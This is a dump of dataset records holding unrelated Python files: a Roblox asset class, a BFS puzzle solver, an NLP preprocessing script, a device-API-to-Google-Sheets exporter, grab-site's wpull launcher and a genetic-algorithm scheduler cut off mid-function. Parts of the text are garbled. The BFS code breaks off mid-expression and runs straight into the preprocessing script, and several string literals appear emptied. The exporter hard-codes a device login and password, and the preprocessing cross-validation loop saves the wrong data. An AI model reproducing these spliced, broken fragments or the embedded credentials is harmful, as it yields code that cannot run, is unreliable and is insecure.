__dict__(self):\r\n return self.chart_dict\r\n\r\n def __iter__(self):\r\n return list(self.chart_dict.values())\r\n\r\n def __getitem__(self, index):\r\n return list(self.chart_dict.values())[index]\r\n\r\n def __len__(self):\r\n return len(self.chart_dict)\r\n\r\n def __reversed__(self):\r\n return reversed(list(self.chart_dict.values()))\r\n\r\n def __contains__(self, item):\r\n if isinstance(item, datetime.date):\r\n return item in self.chart_dict.keys()\r\n elif isinstance(item, sales_point):\r\n return item in self.chart_dict.values()\r\n return False\r\n\r\n def __repr__(self):\r\n return \"\".format(self)\r\n\r\n\r\nclass Comment(object):\r\n \"\"\"Asset comment.\r\n\r\n Attributes\r\n ----------\r\n asset : :class:`Asset`\r\n Asset the comment belongs to\r\n content : str\r\n Comment content\r\n created : :class:`datetime.datetime`\r\n When the comment was posted\"\"\"\r\n\r\n __slots__ = [\"asset\", \"content\", \"created\", \"_user\", \"_user_cache\"]\r\n\r\n def __init__(self, asset, content=None, created=None, author=None):\r\n \"\"\"\r\n :type asset: :class:`Asset`\r\n \"\"\"\r\n self.asset = asset\r\n\r\n self.content = content\r\n self.created = utils.get_datetime(created) if created else None\r\n\r\n self._user = author\r\n self._user_cache = None\r\n\r\n def __eq__(self, other):\r\n if not isinstance(other, type(self)):\r\n return False\r\n\r\n return self.asset == other.asset and self.created == other.created and self.author == other.author\r\n\r\n def __repr__(self):\r\n return \"\".format(self)\r\n\r\n def __str__(self):\r\n return self.content\r\n\r\n @property\r\n @faste.decor.rr_cache()\r\n def author(self):\r\n \"\"\"User who made the post.\r\n\r\n :returns: :class:`User`\"\"\"\r\n\r\n if type(self._user) == int:\r\n return 
self.asset.client.get_user(user_id=self._user)\r\n elif type(self._user) == str:\r\n return self.asset.client.get_user(username=self._user)\r\n\r\n return self._user\r\n\r\n","sub_path":"roblox/asset.py","file_name":"asset.py","file_ext":"py","file_size_in_byte":12222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"248419761","text":"from collections import deque\n\nm, n = map(int, input().split())\n\ndx = [0,0,1,-1]\ndy = [1,-1,0,0]\n\ndef bfs():\n cnt = 0\n while ripen_tomato:\n cnt += 1\n for _ in range(len(ripen_tomato)):\n y, x = ripen_tomato.popleft()\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n if 0<=nx max_len else max_len\nmax_len = max([len(i) for i in val_text]) if max([len(i) for i in val_text]) > max_len else max_len\nprint(\"Maximum sentence length: \", max_len)\n\n#Sample if necessary.\nif args.sampling:\n\n #Generates a sample of 10% the dataset size.\n indices = np.random.choice(len(train_text), int(0.1 * len(train_text)))\n train_text = [train_text[index] for index in indices]\n train_label = [train_label[index] for index in indices]\n\n#Add padding to vocabulary\nreverse_dictionary['PAD'] = len(dictionary)\ndictionary[len(dictionary)] = 'PAD'\nwith open(args.emb_path, 'rb') as f:\n embeddings = pkl.load(f)\n embeddings = np.vstack((embeddings, np.zeros((1, embeddings.shape[1]))))\n\nwith open(os.path.join(args.data_path.split('/')[0], 'embeddings.pkl'), 'wb') as f:\n pkl.dump(embeddings, f) \n\ndef store(x, y, path, mode):\n \n #Since the vocabulary is indexed from 0, padding index is moved to length_of_vocabulary. \n x = pad_sequences(x, maxlen=max_len, dtype=\"int32\", padding='post', value=reverse_dictionary['PAD']) \n y = np.array(y).squeeze()\n\n\n with h5py.File(os.path.join(path, mode + '.h5'), 'w') as handle:\n handle.create_dataset('x', data=x)\n handle.create_dataset('y', data=y)\n\nif args.mode != 'cv':\n \n store(train_text, train_label, args.save_path, 'train')\n store(val_text, val_label, args.save_path, 'valid') \n \nelse:\n\n kf = KFold(n_splits=5)\n\n for fold, indices in enumerate(kf.split(train_text)):\n\n fold_path = os.path.join(args.save_path, 'fold{}'.format(fold))\n if not os.path.isdir(fold_path):\n os.makedirs(fold_path)\n \n train_text_fold, train_label_fold = [train_text[i] for i in indices[0]], [train_label[i] for i in indices[0]] \n val_text_fold, val_label_fold = [train_text[i] for i in indices[1]], [train_label[i] for i in indices[1]] \n \n store(train_text, train_label, fold_path, 'train')\n store(val_text, val_label, fold_path, 'valid') \n\nstore(test_text, test_label, args.save_path, 'test')\n","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"165535618","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Mar 29 12:27:28 2021\r\n\r\n@author: User\r\n\"\"\"\r\n\r\n\r\nfrom __future__ import print_function\r\n\r\nimport requests\r\n\r\nfrom requests.auth import HTTPBasicAuth\r\n\r\nimport datetime \r\nfrom datetime import datetime, timedelta\r\n\r\n\r\n\r\ntoday = datetime.today().strftime('%Y-%m-%dT%H:%M:%S.%f')[:-7] \r\n\r\n#N = 7\r\n\r\n#date_N_days_ago = datetime.today() - timedelta(days=N) \r\n#week_ago=date_N_days_ago.strftime('%Y-%m-%dT%H:%M:%S.%f')[:-7]\r\n\r\nheaders_oi = { 'Content-Type': 'application/json','MAC':'54:10:EC:B6:FD:60'}\r\n\r\n\r\n\r\nresponse_oi = 
requests.get('http://192.168.254.11/api/data/historical/zone/dwell/summary?element=Zone 0&format=json&from=2020-05-15T09:00:00&to={}&granularity=ONE_HOUR'.format(today), headers=headers_oi, auth=HTTPBasicAuth('Admin', 'dimin3421'))\r\n# try:\r\n#     json_data = response_oi.json()\r\n#     print(json_data.content)\r\n# except ValueError:\r\n#     print(\"Response content is not valid\")\r\n\r\nj_data_oi = response_oi.json()\r\n#print(response_oi.content)\r\n\r\nresponse_oi2 = requests.get('http://192.168.254.11/api/data/historical/zone/inoutcount?element=Zone 0&format=json&from=2020-05-15T09:00:00&to={}&granularity=ONE_HOUR'.format(today), headers=headers_oi, auth=HTTPBasicAuth('Admin', 'dimin3421'))\r\n\r\nj_data_oi2 = response_oi2.json()\r\n\r\nin_number_oi = []\r\nout_number_oi = []\r\n\r\nfor results2 in j_data_oi2['content']['element'][0]['measurement']:\r\n    in_number_oi.append(results2['value'][0]['value'])\r\nfor results3 in j_data_oi2['content']['element'][0]['measurement']:\r\n    out_number_oi.append(results3['value'][1]['value'])\r\n\r\n\r\ntime_oi = []\r\ncounts_oi = []\r\n\r\nstat_oi = []\r\nfor result in j_data_oi['content']['element'][0]['measurement']:\r\n    time_oi.append(result['from'])\r\nfor results2 in j_data_oi['content']['element'][0]['measurement']:\r\n    stat_oi.append(results2['value'][0]['value'])\r\nfor results in j_data_oi['content']['element'][0]['measurement']:\r\n    counts_oi.append(results['value'][1]['value'])\r\n\r\nimport pandas as pd\r\ndata_oi = pd.DataFrame(time_oi, columns=['Time'])\r\ndata_oi['Counts All'] = pd.DataFrame(in_number_oi)\r\n\r\ndata_oi['Counts'] = pd.DataFrame(counts_oi)\r\ndata_oi['Stat'] = pd.DataFrame(stat_oi)\r\ndata_oi = data_oi.fillna(0)\r\n\r\nimport pickle\r\nimport os.path\r\nfrom googleapiclient.discovery import build\r\nfrom google_auth_oauthlib.flow import InstalledAppFlow\r\nfrom google.auth.transport.requests import Request\r\nimport requests\r\n\r\n# change this to your sheet ID\r\nSAMPLE_SPREADSHEET_ID_input = '1kUahG86CFtDXU8KH_-j6yoNlfQn9M2JKt-I4rnqGMtI'\r\n\r\n# change the range if needed\r\nSAMPLE_RANGE_NAME = 'A:D'\r\n\r\ndef Create_Service(client_secret_file, api_service_name, api_version, *scopes):\r\n    global service\r\n    SCOPES = [scope for scope in scopes[0]]\r\n    #print(SCOPES)\r\n\r\n    cred = None\r\n\r\n    if os.path.exists('token_write.pickle'):\r\n        with open('token_write.pickle', 'rb') as token:\r\n            cred = pickle.load(token)\r\n\r\n    if not cred or not cred.valid:\r\n        if cred and cred.expired and cred.refresh_token:\r\n            cred.refresh(Request())\r\n        else:\r\n            flow = InstalledAppFlow.from_client_secrets_file(client_secret_file, SCOPES)\r\n            cred = flow.run_local_server()\r\n\r\n        with open('token_write.pickle', 'wb') as token:\r\n            pickle.dump(cred, token)\r\n\r\n    try:\r\n        service = build(api_service_name, api_version, credentials=cred)\r\n        print(api_service_name, 'service created successfully')\r\n        #return service\r\n    except Exception as e:\r\n        print(e)\r\n        #return None\r\n\r\n# change 'my_json_file.json' to your downloaded JSON file.\r\nCreate_Service('credentials.json', 'sheets', 'v4', ['https://www.googleapis.com/auth/spreadsheets'])\r\n\r\ndef Export_Data_To_Sheets():\r\n\r\n    response_date = service.spreadsheets().values().update(\r\n        spreadsheetId=SAMPLE_SPREADSHEET_ID_input,\r\n        valueInputOption='RAW',\r\n        range=SAMPLE_RANGE_NAME,\r\n        body=dict(\r\n            majorDimension='ROWS',\r\n            values=data_oi.values.tolist())\r\n    ).execute()\r\n    print('Sheet successfully 
Updated')\r\n\r\nExport_Data_To_Sheets()","sub_path":"our_impact.py","file_name":"our_impact.py","file_ext":"py","file_size_in_byte":4142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"483229530","text":"import faulthandler\nfaulthandler.enable()\n\nimport re\nimport os\nimport sys\nimport binascii\nimport datetime\nimport click\nimport libgrabsite\n\ndef print_version(ctx, param, value):\n\tif not value or ctx.resilient_parsing:\n\t\treturn\n\tclick.echo(libgrabsite.__version__)\n\tctx.exit()\n\n\n@click.command()\n\n@click.option('--concurrency', default=2, metavar='NUM',\n\thelp='Use this many connections to fetch in parallel (default: 2).')\n\n@click.option('--concurrent', default=-1, metavar='NUM',\n\thelp='Alias for --concurrency.')\n\n@click.option('--delay', default=\"0\", metavar='DELAY',\n\thelp=\n\t\t'Time to wait between requests, in milliseconds (default: 0). '\n\t\t'Can be \"NUM\", or \"MIN-MAX\" to use a random delay between MIN and MAX '\n\t\t'for each request. Delay applies to each concurrent fetcher, not globally.')\n\n@click.option('--recursive/--1', default=True,\n\thelp=\n\t\t'--recursive (default: true) to crawl under last /path/ component '\n\t\t'recursively, or --1 to get just START_URL.')\n\n@click.option('--offsite-links/--no-offsite-links', default=False,\n\thelp=\n\t\t'--offsite-links (default: true) to grab all links to a depth of 1 '\n\t\t'on other domains, or --no-offsite-links to disable.')\n\n@click.option('--igsets', default=\"\", metavar='LIST',\n\thelp='Comma-separated list of ignore sets to use in addition to \"global\".')\n\n@click.option('--ignore-sets', default=\"\", metavar='LIST',\n\thelp='Alias for --igsets.')\n\n@click.option('--igon/--igoff', default=False,\n\thelp=\n\t\t'--igon (default: false) to print all URLs being ignored to the terminal '\n\t\t'and dashboard.')\n\n@click.option('--max-content-length', default=-1, metavar='N',\n\thelp=\n\t\t\"Skip the download of any response that claims a Content-Length \"\n\t\t\"larger than N (default: -1, don't skip anything).\")\n\n@click.option('--level', default=\"inf\", metavar='NUM',\n\thelp='Recurse this many levels (default: inf).')\n\n@click.option('--page-requisites-level', default=\"5\", metavar='NUM',\n\thelp='Recursive this many levels for page requisites (default: 5).')\n\n@click.option('--ua', default=\"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0\",\n\tmetavar='STRING', help='Send User-Agent: STRING instead of pretending to be Firefox on Windows.')\n\n@click.option('--sitemaps/--no-sitemaps', default=True,\n\thelp=\n\t\t'--sitemaps (default: true) to queue URLs from sitemap.xml '\n\t\t'at the root of the site, or --no-sitemaps to disable.')\n\n@click.option('--version', is_flag=True, callback=print_version,\n\texpose_value=False, is_eager=True, help='Print version and exit.')\n\n@click.argument('start_url')\n\ndef main(concurrency, concurrent, delay, recursive, offsite_links, igsets,\nignore_sets, igon, level, page_requisites_level, max_content_length, sitemaps,\nua, start_url):\n\tspan_hosts_allow = \"page-requisites,linked-pages\"\n\tif not offsite_links:\n\t\tspan_hosts_allow = \"page-requisites\"\n\n\tif concurrent != -1:\n\t\tconcurrency = concurrent\n\n\tif ignore_sets != \"\":\n\t\tigsets = ignore_sets\n\n\tid = binascii.hexlify(os.urandom(16)).decode('utf-8')\n\tymd = datetime.datetime.utcnow().isoformat()[:10]\n\tno_proto_no_trailing = start_url.split('://', 1)[1].rstrip('/')[:100]\n\twarc_name = 
\"{}-{}-{}\".format(re.sub('[^-_a-zA-Z0-9%\\.,;@+=]', '-', no_proto_no_trailing), ymd, id[:8])\n\n\t# make absolute because wpull will start in temp/\n\tworking_dir = os.path.abspath(warc_name)\n\tos.makedirs(working_dir)\n\ttemp_dir = os.path.join(working_dir, \"temp\")\n\tos.makedirs(temp_dir)\n\n\twith open(\"{}/id\".format(working_dir), \"w\") as f:\n\t\tf.write(id)\n\n\twith open(\"{}/start_url\".format(working_dir), \"w\") as f:\n\t\tf.write(start_url)\n\n\twith open(\"{}/concurrency\".format(working_dir), \"w\") as f:\n\t\tf.write(str(concurrency))\n\n\twith open(\"{}/max_content_length\".format(working_dir), \"w\") as f:\n\t\tf.write(str(max_content_length))\n\n\twith open(\"{}/igsets\".format(working_dir), \"w\") as f:\n\t\tf.write(\"global,{}\".format(igsets))\n\n\tif not igon:\n\t\twith open(\"{}/igoff\".format(working_dir), \"w\") as f:\n\t\t\tpass\n\n\twith open(\"{}/ignores\".format(working_dir), \"w\") as f:\n\t\tpass\n\n\twith open(\"{}/delay\".format(working_dir), \"w\") as f:\n\t\tf.write(delay)\n\n\tLIBGRABSITE = os.path.dirname(libgrabsite.__file__)\n\targs = [\n\t\t\"-U\", ua,\n\t\t\"--header=Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\n\t\t\"--header=Accept-Language: en-US,en;q=0.5\",\n\t\t\"-o\", \"{}/wpull.log\".format(working_dir),\n\t\t\"--database\", \"{}/wpull.db\".format(working_dir),\n\t\t\"--plugin-script\", \"{}/plugin.py\".format(LIBGRABSITE),\n\t\t\"--python-script\", \"{}/wpull_hooks.py\".format(LIBGRABSITE),\n\t\t\"--save-cookies\", \"{}/cookies.txt\".format(working_dir),\n\t\t\"--no-check-certificate\",\n\t\t\"--delete-after\",\n\t\t\"--no-robots\",\n\t\t\"--page-requisites\",\n\t\t\"--no-parent\",\n\t\t\"--inet4-only\",\n\t\t\"--timeout\", \"20\",\n\t\t\"--tries\", \"3\",\n\t\t\"--concurrent\", str(concurrency),\n\t\t\"--waitretry\", \"5\",\n\t\t\"--warc-file\", \"{}/{}\".format(working_dir, warc_name),\n\t\t\"--warc-max-size\", \"5368709120\",\n\t\t\"--warc-cdx\",\n\t\t\"--debug-manhole\",\n\t\t\"--strip-session-id\",\n\t\t\"--escaped-fragment\",\n\t\t\"--monitor-disk\", \"400m\",\n\t\t\"--monitor-memory\", \"10k\",\n\t\t\"--max-redirect\", \"8\",\n\t\t\"--level\", level,\n\t\t\"--page-requisites-level\", page_requisites_level,\n\t\t\"--span-hosts-allow\", span_hosts_allow,\n\t\t\"--quiet\",\n\t]\n\n\tif sitemaps:\n\t\targs += [\"--sitemaps\"]\n\n\tif recursive:\n\t\targs += [\"--recursive\"]\n\n\targs += [start_url]\n\n\t# Mutate argv, environ, cwd before we turn into wpull\n\tsys.argv[1:] = args\n\tos.environ[\"GRAB_SITE_WORKING_DIR\"] = working_dir\n\t# We can use --warc-tempdir= to put WARC-related temporary files in a temp\n\t# directory, but wpull also creates non-WARC-related \"resp_cb\" temporary\n\t# files in the cwd, so we must start wpull in temp/ anyway.\n\tos.chdir(temp_dir)\n\n\tfrom wpull.app import Application\n\tdef noop_setup_signal_handlers(self):\n\t\tpass\n\n\t# Don't let wpull install a handler for SIGINT or SIGTERM,\n\t# because we install our own in wpull_hooks.py.\n\tApplication.setup_signal_handlers = noop_setup_signal_handlers\n\n\timport wpull.__main__\n\twpull.__main__.main()\n\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"libgrabsite/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"133367557","text":"'''Soubry schedulor version 0.0.0\r\n Features: \r\n 1. Runnable script from cmd.\r\n 2. Rewrite functions, make better reuse of code. \r\n 3. 
Normalization of input/output.\r\n'''\r\n# Core modules\r\nimport sys\r\nimport csv\r\nimport collections\r\nimport argparse\r\nimport warnings\r\nfrom datetime import timedelta, datetime\r\nfrom operator import add\r\nimport operator\r\n#import logging\r\nimport os\r\nimport math\r\nimport random\r\nimport itertools\r\nimport time\r\nimport msvcrt\r\nfrom population import Schedule\r\nfrom collections import OrderedDict\r\nfrom helperfunctions import JobInfo, read_down_durations, read_product_related_characteristics, read_precedence, read_price,\\\r\nread_breakdown_record\r\n\r\n# import pickle\r\n# duration_str = 'quantity' \r\n\r\n# 3rd-party modules\r\nimport numpy as np\r\nimport pandas as pd\r\nimport logging\r\n\r\nlogger = logging.getLogger(__name__)\r\nfrom sympy.printing.precedence import precedence\r\n\r\n# Global variables\r\n# POP_SIZE = 8 \r\n# CROSS_RATE = 0.6\r\n# MUTATION_RATE = 0.8\r\n# N_GENERATIONS = 200\r\n\r\nC1 = 10  # Used for failure cost calculation in run-down scenario\r\nC2 = 30\r\n\r\n\r\ndef ceil_dt(dt, delta):\r\n    '''\r\n    Ceil a date time dt according to the measurement delta.\r\n\r\n    Parameters\r\n    ----------\r\n    dt : datetime\r\n        Objective date time to ceil.\r\n    delta : timedelta\r\n        Measurement precision.\r\n\r\n    Returns\r\n    -------\r\n    Ceiled date time\r\n\r\n    '''\r\n    tempdelta = dt - datetime.min\r\n    if tempdelta % delta != 0:\r\n        return dt + (delta - (tempdelta % delta))\r\n    else:\r\n        return dt\r\n    # q, r = divmod(dt - datetime.min, delta)\r\n    # return (datetime.min + (q+1)*delta) if r else dt\r\n\r\n\r\ndef floor_dt(dt, delta):\r\n    '''\r\n    Floor a date time dt according to the measurement delta.\r\n\r\n    Parameters\r\n    ----------\r\n    dt : datetime\r\n        Objective date time to floor.\r\n    delta : timedelta\r\n        Measurement precision.\r\n\r\n    Returns\r\n    -------\r\n    Floored date time\r\n    '''\r\n    tempdelta = dt - datetime.min\r\n    if tempdelta % delta != 0:\r\n        return dt - (tempdelta % delta)\r\n    else:\r\n        return dt\r\n    # q, r = divmod(dt - datetime.min, delta)\r\n    # return (datetime.min + (q)*delta) if r else dt\r\n\r\n\r\ndef get_hourly_failure_dict(start_time, end_time, failure_list, down_duration_dict):\r\n    '''\r\n    Get the hourly failure rate between a determined start time and end time.\r\n    '''\r\n    hourly_failure_dict = {}\r\n    t_sd = floor_dt(start_time, timedelta(hours=1))  # start time left border\r\n    t_eu = ceil_dt(end_time, timedelta(hours=1))  # end time right border\r\n    print(\"down duration dict\", down_duration_dict)\r\n\r\n    # Filtering down time, get all down durations longer than one hour\r\n    down_duration_dict_filtered = collections.OrderedDict()\r\n    for key, value in down_duration_dict.items():\r\n        if (value[1] - value[0]) / timedelta(hours=1) >= 1:\r\n            down_duration_dict_filtered.update({key:[floor_dt(value[0], timedelta(hours=1)), floor_dt(value[1], timedelta(hours=1))]})\r\n\r\n    print(\"down_duration_dict_filtered:\", down_duration_dict_filtered)\r\n    i = t_sd\r\n    index = 0\r\n    for value in down_duration_dict_filtered.values():\r\n        while i < value[0]:\r\n            hourly_failure_dict.update({i:failure_list[index]})\r\n            i = i + timedelta(hours=1)\r\n            index = index+1\r\n        while i <= value[1]:\r\n            hourly_failure_dict.update({i:float(0)})\r\n            i = i + timedelta(hours=1)\r\n        index = 0\r\n\r\n#     print(\"i:\", i)\r\n#     print(\"index:\", index)\r\n\r\n    while i <= t_eu:\r\n        hourly_failure_dict.update({i:failure_list[index]})\r\n        i = i + timedelta(hours=1)\r\n        index = index+1\r\n\r\n    return hourly_failure_dict\r\n\r\n\r\ndef hamming_distance(s1, 
s2):\r\n ''' \r\n Calculate the hamming distance (the number of positions at which the corresponding symbols are different) of two list.\r\n\r\n Parameters\r\n ----------\r\n s1: List\r\n A list of job indexes.\r\n \r\n s2: list\r\n A list of job indexes.\r\n \r\n Returns\r\n -------\r\n The hamming distance of two lists.\r\n '''\r\n assert len(s1) == len(s2)\r\n return sum(ch1 != ch2 for ch1, ch2 in zip(s1, s2))\r\n\r\n\r\nclass Scheduler(object):\r\n def __init__(self, schedule):\r\n # def __init__(self, job_dict, price_dict, product_related_characteristics_dict, down_duration_dict, precedence_dict,\r\n # start_time, weights, scenario, duration_str, working_method):\r\n self.dna_size = len(schedule.order)\r\n # Attributes assignment\r\n #self.dna_size = len(job_dict)\r\n self.pop = schedule.job_dict.keys()\r\n self.job_dict = schedule.job_dict\r\n self.price_dict = schedule.price_dict\r\n #self.product_related_characteristics_dict = schedule.prc_dict\r\n self.down_duration_dict = schedule.downdur_dict\r\n # self.failure_info = failure_info\r\n # TODO: replace with input data from precedence file\r\n self.precedence_dict = schedule.precedence_dict\r\n self.start_time = schedule.start_time\r\n self.weights = schedule.weights\r\n self.scenario = schedule.scenario\r\n self.duration_str = schedule.duration_str\r\n self.working_method = schedule.working_method \r\n\r\n def get_fitness(self, sub_pop, split_types=False, detail=False):\r\n ''' \r\n Get fitness values for all individuals in a generation.\r\n '''\r\n wf = self.weights.get('weight_failure', 0); wvf =self.weights.get('weight_virtual_failure', 0)\r\n we = self.weights.get('weight_energy', 0); wc = self.weights.get('weight_changeover', 0)\r\n wb = self.weights.get('weight_constraint', 0); wft = self.weights.get('weight_flowtime', 0)\r\n wp = self.weights.get('weight_precedence', 0); nc = self.weights.get('num_changeovers', 0)\r\n factors = (wf, wvf, we, wc, wb, wft, wp, nc)\r\n #import pdb; pdb.set_trace()\r\n if wf or wvf:\r\n #failure_cost, virtual_failure_cost = [np.array(i.get_failure_cost(detail=detail, split_costs=True)) for i in sub_pop]\r\n failure_cost = []\r\n virtual_failure_cost = []\r\n for i in sub_pop:\r\n f_cost, vf_cost = i.get_failure_cost(detail=detail, split_costs=True)\r\n failure_cost.append(np.array(f_cost)); virtual_failure_cost.append(np.array(vf_cost))\r\n else:\r\n failure_cost = [0 for i in sub_pop]\r\n virtual_failure_cost = [0 for i in sub_pop]\r\n if we:\r\n #energy_cost = [self.w2*np.array(get_energy_cost(i, self.start_time, self.job_dict, self.price_dict, self.product_related_characteristics_dict, self.down_duration_dict,\r\n # detail=detail, duration_str=self.duration_str, working_method=self.working_method)) for i in sub_pop]\r\n energy_cost = [np.array(i.get_energy_cost(detail=detail)) for i in sub_pop]\r\n else:\r\n energy_cost = [0 for i in sub_pop]\r\n if wc:\r\n conversion_cost = [np.array(i.get_changeover_cost(detail=detail)) for i in sub_pop]\r\n else:\r\n conversion_cost = [0 for i in sub_pop]\r\n if wb:\r\n constraint_cost = [np.array(i.get_constraint_cost(detail=detail)) for i in sub_pop]\r\n else:\r\n constraint_cost = [0 for i in sub_pop]\r\n if wft:\r\n flowtime_cost = [np.array(i.get_flowtime_cost(detail=detail)) for i in sub_pop]\r\n else:\r\n flowtime_cost = [0 for i in sub_pop]\r\n if wp:\r\n precedence_cost = [np.array(i.get_precedence_cost(detail=detail)) for i in sub_pop]\r\n else:\r\n precedence_cost = [0 for i in sub_pop]\r\n if nc:\r\n num_conversions = 
[np.array(i.get_num_changeovers(detail=detail)) for i in sub_pop]\r\n else:\r\n num_conversions = [0 for i in sub_pop]\r\n if split_types:\r\n total_cost = (np.array(failure_cost), np.array(virtual_failure_cost), np.array(energy_cost), \r\n np.array(conversion_cost), np.array(constraint_cost), np.array(flowtime_cost),\r\n np.array(precedence_cost), np.array(num_conversions),\r\n factors)\r\n else:\r\n try:\r\n total_cost = wf * np.array(failure_cost) + wvf * np.array(virtual_failure_cost) +\\\r\n we * np.array(energy_cost) + wc * np.array(conversion_cost) + wb * np.array(constraint_cost) +\\\r\n wft * np.array(flowtime_cost) + wp * np.array(precedence_cost) +\\\r\n nc * np.array(num_conversions)\r\n except:\r\n print(np.array(failure_cost).shape, np.array(virtual_failure_cost).shape, np.array(energy_cost).shape,\r\n np.array(conversion_cost).shape, np.array(flowtime_cost).shape, np.array(constraint_cost).shape)\r\n print(detail)\r\n print(constraint_cost)\r\n import pdb; pdb.set_trace()\r\n raise\r\n return total_cost \r\n \r\n \r\n# class BF(Scheduler):\r\n# def __init__(self, job_dict, price_dict, product_related_characteristics_dict, down_duration_dict, precedence_dict,\r\n# start_time, weight1, weight2, weightc, weightb, scenario, duration_str, working_method):\r\n# # Attributes assignment\r\n# super().__init__(job_dict, price_dict, product_related_characteristics_dict, down_duration_dict, precedence_dict,\r\n# start_time, weight1, weight2, weightc, weightb, scenario, duration_str, working_method)\r\n\r\n \r\n# def check_all(self):\r\n# if len(self.pop) > 10:\r\n# raise ValueError('The input is too long, no brute force recommended')\r\n# tot_cost_min = np.inf\r\n# best_sched = []\r\n# tot_cost_max = 0\r\n# worst_sched = []\r\n# import itertools\r\n# allperm = itertools.permutations(self.pop)\r\n# totallen = math.factorial(len(self.pop))\r\n# i = 0\r\n# while i < totallen:\r\n# test = next(allperm)\r\n# tot_cost = self.get_fitness([Schedule(test, \r\n# self.job_dict, self.start_time, \r\n# self.product_related_characteristics_dict,\r\n# self.down_duration_dict, self.price_dict, self.failure_info,\r\n# self.scenario, self.duration_str, self.working_method, self.weights)])[0]\r\n# if tot_cost < tot_cost_min:\r\n# tot_cost_min = tot_cost\r\n# best_sched = test\r\n# if tot_cost > tot_cost_max:\r\n# tot_cost_max = tot_cost\r\n# worst_sched = test\r\n# i += 1\r\n# print(str(i) + '/' + str(totallen) + '\\t {:}'.format(tot_cost_min), end='\\r')\r\n# if msvcrt.kbhit() == True:\r\n# char = msvcrt.getch()\r\n# if char in [b'c', b'q']:\r\n# print('User hit c or q button, exiting...')\r\n# break\r\n# print('\\n')\r\n\r\n# return tot_cost_min, tot_cost_max, best_sched, worst_sched\r\n\r\n\r\nclass GA(Scheduler):\r\n def __init__(self, schedule, settings):\r\n # def __init__(self, dna_size, cross_rate, mutation_rate, pop_size, pop, job_dict, price_dict, \r\n # product_related_characteristics_dict, down_duration_dict, precedence_dict, start_time, weights, scenario,\r\n # num_mutations=1, duration_str='expected', evolution_method='roulette', validation=False, pre_selection=False,\r\n # working_method='historical', failure_info=None):\r\n # Attributes assignment\r\n super().__init__(schedule)\r\n self.schedule = schedule\r\n self.pop_size = settings.pop_size\r\n self.cross_rate = settings.cross_rate\r\n self.mutation_rate = settings.mutation_rate\r\n self.num_mutations = settings.num_mutations\r\n self.evolution_method = settings.evolution_method\r\n self.validation = settings.validation\r\n 
self.pre_selection = settings.pre_selection\r\n # generate N random individuals (N = pop_size)\r\n # BETTER METHOD: FUTURE WORK\r\n # Add functionality: first due date first TODO:\r\n if self.pre_selection == True:\r\n # In this case, EDD rule has already been applied on the pop\r\n # Such procedure is executed in run_opt()\r\n self.pop = np.array([schedule for _ in range(self.pop_size)])\r\n #self.pop = np.vstack(pop for _ in range(pop_size))\r\n else:\r\n self.pop = np.array([schedule.copy_random()\r\n for _ in range(self.pop_size)])\r\n #self.pop = np.vstack([np.random.choice(pop, size=self.dna_size, replace=False) for _ in range(pop_size)])\r\n self.memory = []\r\n self.fitness = self.get_fitness(self.pop)\r\n \r\n def crossover(self, winner_loser): \r\n ''' Using microbial genetic evolution strategy, the crossover result is used to represent the loser.\r\n An example image of this can be found in 'Production Scheduling and Rescheduling with Genetic Algorithms, C. Bierwirth, page 6'.\r\n '''\r\n def crossover_function(L, W):\r\n M = [bool(random.randint(0, 1)) for item in L]\r\n temp = list(W.copy())\r\n for (m, i) in zip(M, range(len(L))):\r\n if m:\r\n temp.remove(L[i])\r\n #print(temp)\r\n\r\n child = []\r\n j = 0\r\n for (m, i) in zip(M, range(len(L))):\r\n if m:\r\n child.append(L[i])\r\n else:\r\n child.append(temp[j])\r\n j += 1\r\n return child\r\n \r\n # crossover for loser\r\n if np.random.rand() < self.cross_rate:\r\n try:\r\n #import pdb; pdb.set_trace()\r\n #mask = np.random.randint(0, 2, len(winner_loser[0])).astype(np.bool))\r\n #keep_job = winner_loser[1][~mask]\r\n \r\n #np.place(winner_loser[0], ~mask, keep_job)\r\n winner = winner_loser[0]\r\n loser = winner_loser[1]\r\n \r\n child = crossover_function(loser, winner)\r\n winner_loser[1] = child\r\n \r\n if False: # do not execute this any more\r\n cross_points = np.random.randint(0, 2, self.dna_size).astype(np.bool)\r\n keep_job = winner_loser[1][~cross_points] # see the progress explained in the paper\r\n swap_job = winner_loser[0, np.isin(winner_loser[0].ravel(), keep_job, invert=True)]\r\n winner_loser[1][:] = np.concatenate((keep_job, swap_job))\r\n except:\r\n #print(keep_job)\r\n raise\r\n return winner_loser\r\n\r\n def crossover_similar(self, winner_loser): \r\n ''' Using microbial genetic evolution strategy, the crossover result is used to represent the loser.\r\n This algorithm keeps the jobs which are common between two lists at the same place.\r\n An example image of this can be found in 'A genetic algorithm for hybrid flowshops, page 788'.\r\n '''\r\n # determine common points\r\n #print(winner_loser.shape)\r\n # crossover for loser\r\n if np.random.rand() < self.cross_rate:\r\n try:\r\n winner = np.array(winner_loser[0])\r\n loser = np.array(winner_loser[1])\r\n winner_out = winner.copy()\r\n loser_out = loser.copy()\r\n same = (winner == loser)\r\n\r\n cross_point = int(np.random.choice(np.arange(len(winner)), size=1))\r\n same[:cross_point] = True\r\n different = np.invert(same)\r\n\r\n np.putmask(loser_out, different, winner[np.isin(winner, different)])\r\n np.putmask(winner_out, different, loser[np.isin(loser, different)])\r\n except:\r\n raise\r\n #winner_loser = np.array([winner_out, loser_out])\r\n return winner_loser\r\n\r\n def mutate(self, loser, prob=False, perimeter=None):\r\n ''' Using microbial genetic evolution strategy, mutation only works on the loser.\r\n Two random points change place here.\r\n '''\r\n # mutation for loser, randomly choose two points and do the swap\r\n if 
